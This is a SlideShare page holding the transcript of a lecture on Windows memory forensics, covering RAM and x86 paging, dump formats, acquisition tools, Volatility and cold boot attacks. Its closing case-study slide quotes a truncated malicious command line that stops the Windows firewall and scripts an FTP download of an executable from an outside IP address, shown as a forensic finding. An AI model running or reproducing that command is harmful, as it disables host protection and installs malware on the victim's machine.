• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Memory Forensics
 

Memory Forensics

on

  • 2,244 views

Memory Forensics Presentation from one of my lectures. I have tried to explain the functioning of memory in 32 bit architecture, how paging works, how windows manage its memory pages and how memory ...

Memory Forensics Presentation from one of my lectures. I have tried to explain the functioning of memory in 32 bit architecture, how paging works, how windows manage its memory pages and how memory forensics job is done. The forensics part focuses on collecting data and analyzing the same

Statistics

Views

Total Views
2,244
Views on SlideShare
2,244
Embed Views
0

Actions

Likes
1
Downloads
7
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Who am I What has been written in forensics book is “Pull the plug” Things changed post 2005
  • Check that device drivers are in kernel mode and therefore inside protection. A wrong driver may cause BSoD cause it manipultes memory in kernel Mode
  • 32 pin with can specify upto 4 GB of addresses with 2^32 options
  • 2 level structure. 1024 X 1024 X 4KB page Every Process has :- PDE structure (Every entry has 20 bits to point to Page table number and 12 bits for page protection and other house keeping) PTE Structure (Every entry has 20 bits to point to 4 KB page (total 1024 X4KB pages and 12 bits for house keeping) PFN (Page Frame number is the 4 KB frame in memory) Processor uses 10 bits to find PDE, 10 Bits to find PTE and 12 bits to identify individial bit in 4 KB page
  • Crash dump: Good for analysis, Dumped with frozen state of windows, Debugging tools available from microsoft Cons: Writes on the hard drive, By default only windows 2003 dumps full memory. (Small 64KB dump, Kernel dump and full dump) Possiblity to force dump only with registry tweak and after the system is restarted post registry tweak full dump available only with the system with upto 2 GB of RAM Content of pagefile are over written as the dump first freezes the system, dumps the RAM in pagefile and then proceeds to Winen: Propreitory format from encase. Can be converted to other formats includng Raw format with FTK imager from access data Vmem: Virtual machine can be suspended and perfect image stored in Vmem. Format similar to raw and same tools used to parse it .Bin: a dump format from windows Hibernation file: Compressed, File format revealed by Mattihieu Suiche fo Sandman (Now part of volatility) Can be used as memory dump. U can use it as additional dump and compare with current dump
  • Memory is dynamic so try to stop all other activities while performing the capture What do you get….RAM or RAM+Pagefile
  • Fireport device: Extremely fast due to DMA (Bypass OS) Storm.net.nz project. A software driver that can be used and installed in backtrack and other packages fools the windows os that it is an Ipod. Not very successful Blue Screen of Death reported Misses few parts of the memory Tribble needs to be installed in the machine prior to incident All in all not much of success on hardware front……Still on most part only softwares are used for memory dumping that might in fact rely on DLL already compromised on the system.
  • Strings and Grep: Raw searches and doesn’t provide the full context in which that string is used. Memeparser win DFRWS (Digital forensics research workshops) 2005 challenge Voaltility

Memory Forensics Memory Forensics Presentation Transcript

  • Shri Memory Forensics Boonlia Prince Komal Don’t pull the PlugGmail : boonlia@gmail.comFacebook:http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.comTwitter: http://twitter.com/boonlia
  • Live/ Dead Memory Forensics• What is Live Memory and what is Dead Memory – RAM – Pagefile – Hibernation file Hard Drive Live Memory Forensics Where is Hibernation file?
  • Few Basics of RAM• A grid of Capacitors (DRAM)• Bucket with holes• Random Access• Parity Bit for error reporting
  • A Grid of Capacitors Row Select: Set to high for the related row Column Select: Set to high for related column Read write line set to high for read and low for write Data inflow or outflow depending upon the R/W stateAddress Bus: Carries the Address ofmemory locationData Bus: Carries the data in and outthrough the same wires (Read/Write busor simply Data Bus)
  • Bucket with whole (DRAM)Capacitors by their very naturegets discharged rapidlyAny read write operation adds tothese capacitors beingdischargedThis calls for regular refreshingwhere in the entire data is readand written backSRAM Uses transistors (2-4)per bit to show on or off stateper bit
  • Memory Address space Byte Addressable Memory (Reads 8 bits at a time)32 Bit Processor 64 Bit Processor2^32 2^644 GB 17 Billion GB 40 Bit implementation 50 Bit implementation 1024 GB 1024 TB
  • Memory management at a glance ProcessorMemory Manager Application DMA ?
  • Need For a Memory ManagerProtect Operating system and Kernel Memory SpacePrevent Application violations (Accessing otherapplications Memory)Allocate memory judiciouslyAllow Multiple applications to co-existsImprove Memory utilization efficiencyExtend the Memory capacity via swappingProvide Application a simpler platform to use memory(Virtual memory Space) You dont have to create twoprograms for 1 GB and 2 GB RAM machinesManaging the shared memory
  • User mode v/s kernel Mode• Memory protection• Location of both the modes in RAM• /3GB switch in boot.ini• Where the Page directory and Page Table entries are stored• What if User mode needs to access something in Kernel Mode
  • User Mode V/s Kernel Mode Memory
  • Kernel Mode Location of Page table and Page Directory User Mode4GB Space 4GB SpaceWithout With PAEPAE
  • Overview of Virtual Memory Managementon X86 Processor TLB Transaction lookaside buffer
  • Memory management in windowsWindows on 32 Bit X86 Architecture can accessupto 4 GB MemoryWindows can provide 4GB of memory spaceeach to multiprocesses despite the total memorybeing 4 GB maxThis is done by using the X86 feature calledpagingEvery Memory page is 4KB
  • Virtual memory to physical memory
  • The Paging Process in x86 processorImage source:technet.microsoft.com
  • Few Concepts in Windows Memory Management Process Memory Usage Counters Virtual Size Private Byte Counter Working Set Physical Memory (Say 1GB) Private Bytes Working SetVirtual 2 GBSize Shared Memory
  • Page lists in Windows (Dont confuse with page table) 1) Zero Page list Pages that carries no data and are ready to be assigned to a process 3) Free Page list Pages not being used by any process and free but still contains data 2) Standby Page list Unmodified Pages that are taken away from a process 4) Modified Page list Modified pages pertaining to a process taken away from that process
  • Windows Memory Management at a Glance Process Page Working set ve d File Modified a ded ns t a & N ee Page U a 1 M odified DBoot P ages List Sa ve d da ta Hard 2 Drive U nm o dified page s nee Zero d ed Standby Page 3 Me List mo List ry no lon g er n eed ed Free Page n List Exceeding memory use ormemory crunch situation in red font
  • Memory Management in OS• Memory Manager – Large address space - user programs can reference more memory than physically exists – Protection - the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only-data. – Memory Mapping - clients can map a file into an area of virtual memory and access the file as memory – Fair Access to Physical Memory - the memory manager ensures that processes all have fair access to the machines memory resources, thus ensuring reasonable system performance – Shared Memory - the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes.
  • What can be found in memory• The running processes• The Running threads• The passwords/ Keys and other information• Live registry hives• Live chats and login informations• Malware presence including rootkits• Open connections to the net / Network• Open Files and their remnants• .• .• In fact any thing that processor works upon
  • The Process of Memory forensics• Capture the memory• Analyze the memory• Reconstruction of the memory state• Reconstruction of the entire scenario with disk image and memory image in conjunction
  • Various formats• Raw Dump (Linear format) (.img/.dd)• Windows Crash dump format (.bin) – BSoD (Written after the system is frozen)• Hiberfil.sys format• Commercial tools format – Winen .E01 kind of format – .Vmem (Vmware) – .Bin (Hyper V) – Fastdump Pro (hpak)
  • Capturing the memory• Tools – DD / DCFLDD/ DC3DD • dd if=.PhysicalMemory of=f:memory.img – Memdump – Win32dd – Nigilant32 – Fastdump (Fastdump pro dumps page file content too) – MDD – Winen (Encase) – Memoryze (Dumps the pagefile content too) – Livekd.exe (From microsoft)
  • Brief demo on memory acquisition with win32dd
  • Hardware approach• Firewire port device (DMA) • http://www.storm.net.nz/projects/16• PCI Device by Brian Carrier and Joe Grand – Tribble Device
  • Analysing the memory dump• String search with strings.exe• Grep search with grep command• DFRWS 2005 (Memparser)• 2007: Aaron Walters- Volatility frmework• Several Plugins for Volatiltiy• Pdfbook, Pdgmail, Pdymail, Skypeeks• Memparser• Memoryzer and Audit Viewer
  • Volatility Framework What is volatility Volatility plugins Using volatility on memory dumps Demo with few options for analysis
  • Cold Boot Attack• Memory doesn’t gets empty that fast• Even after 30 Seconds to even minutes of system shutdown the memory contains data• This Time can be prolonged if the memory is cooled down. The coolant applied instantly reduce the temperature of -50
  • Case StudyShell C:windowssystem32cmd.exe /c net1 stopsharedaccess&echo open 111.67.192.11> cmd.txt&echochajian>> cmd.txt&echo 123>> cmd.txt&echobinary>>cmd.txt&echo get seo.exe>>…………..
  • Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 You can reach us at or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/#!/boonlia boonlia@gmail.com bhansalireena@gmail.comhttp://nullcon.netnullcon Goa 2010